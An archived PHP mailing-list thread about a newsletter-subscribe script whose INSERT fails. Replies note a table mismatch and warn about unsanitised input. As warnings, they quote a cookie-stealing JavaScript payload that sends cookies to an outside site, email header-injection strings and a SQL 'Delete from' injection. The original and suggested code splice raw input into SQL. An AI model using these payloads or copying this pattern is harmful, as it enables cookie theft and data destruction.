Re: [PHP-DB] insert (database)
Martin Norland wrote: Jochem Maas wrote: Yemi Obembe wrote: the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why? if ($v = strtolower($_POST['email'])) { what happens when $_POST['email'] is equal to '
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
'; or something like that? Just something to think about. Then the malicious user gets to send their own cookies for this site to another site of their choosing :P. I would be more worried about it being equal to things like: "Spam my Enemy <[EMAIL PROTECTED]>" + "Spam my Enemy also <[EMAIL PROTECTED]>" + etc. or "\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>" or "'; Delete from arbitrary_table_name where 'yes'='yes" ah yes - that would an effective attack in/on an email ;-) All of which are easily prevented with some attention to detail. (or in some cases newer versions of software, which explicitly allow only one statement per call). Finally - the concept of bind variables (or equivalent) are your friend (as Jochem already knows with firebird iirc). yes indeed! praise to the guy who wrote the new firebird extension :-), savin' my ass on a daily basis :-) Cheers, -- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DB] insert (database)
Jochem Maas wrote: Yemi Obembe wrote: the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why? if ($v = strtolower($_POST['email'])) { what happens when $_POST['email'] is equal to ' document.location = "http://www.evilkid.net/?stolencookie"+document.cookie; '; or something like that? Just something to think about. Then the malicious user gets to send their own cookies for this site to another site of their choosing :P. I would be more worried about it being equal to things like: "Spam my Enemy <[EMAIL PROTECTED]>" + "Spam my Enemy also <[EMAIL PROTECTED]>" + etc. or "\r\nFrom: Idiots Inc. <[EMAIL PROTECTED]>" or "'; Delete from arbitrary_table_name where 'yes'='yes" All of which are easily prevented with some attention to detail. (or in some cases newer versions of software, which explicitly allow only one statement per call). Finally - the concept of bind variables (or equivalent) are your friend (as Jochem already knows with firebird iirc). Cheers, -- - Martin Norland, Database / Web Developer, International Outreach x3257 The opinion(s) contained within this email do not necessarily represent those of St. Jude Children's Research Hospital. -- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP-DB] insert (database)
try if (mysql_num_rows($res)>0) { echo "Your email: $v already in the list"; } else { $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')"; $result_in = mysql_query($sql_in); echo "Your email: $v subscribed!"; } } else { include("index.php"); exit; } bastien From: Yemi Obembe <[EMAIL PROTECTED]> To: php-db@lists.php.net Subject: [PHP-DB] insert (database) Date: Wed, 2 Feb 2005 01:23:16 -0800 (PST) the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why? if ($v = strtolower($_POST['email'])) { $db = mysql_connect(mysql, "usser", "pw"); $con = mysql_select_db("ng",$db); $sql = "SELECT * FROM mytable WHERE email='$v'"; $res = mysql_query( $sql ) ; if ($row = mysql_fetch_array($res)) { echo "Your email: $v already in the list"; } else { $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')"; $result_in = mysql_query($sql_in); echo "Your email: $v subscribed!"; } } else { include("index.php"); exit; } - A passion till tomorrow, Opeyemi Obembe | ng.clawz.com - Do you Yahoo!? Yahoo! Search presents - Jib Jab's 'Second Term' -- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP-DB] insert (database)
Yemi Obembe wrote: the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why? if ($v = strtolower($_POST['email'])) { what happens when $_POST['email'] is equal to ' document.location = "http://www.evilkid.net/?stolencookie"+document.cookie; '; or something like that? Just something to think about. $db = mysql_connect(mysql, "usser", "pw"); $con = mysql_select_db("ng",$db); $sql = "SELECT * FROM mytable WHERE email='$v'"; $res = mysql_query( $sql ) ; if ($row = mysql_fetch_array($res)) { echo "Your email: $v already in the list"; } else { $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')"; $result_in = mysql_query($sql_in); echo "Your email: $v subscribed!"; you use different table names in each query. is that the intention? } } else { include("index.php"); exit; } - A passion till tomorrow, Opeyemi Obembe | ng.clawz.com - Do you Yahoo!? Yahoo! Search presents - Jib Jab's 'Second Term' -- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP-DB] insert (database)
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works finebut the insert doesnt. know why? if ($v = strtolower($_POST['email'])) { $db = mysql_connect(mysql, "usser", "pw"); $con = mysql_select_db("ng",$db); $sql = "SELECT * FROM mytable WHERE email='$v'"; $res = mysql_query( $sql ) ; if ($row = mysql_fetch_array($res)) { echo "Your email: $v already in the list"; } else { $sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')"; $result_in = mysql_query($sql_in); echo "Your email: $v subscribed!"; } } else { include("index.php"); exit; } - A passion till tomorrow, Opeyemi Obembe | ng.clawz.com - Do you Yahoo!? Yahoo! Search presents - Jib Jab's 'Second Term'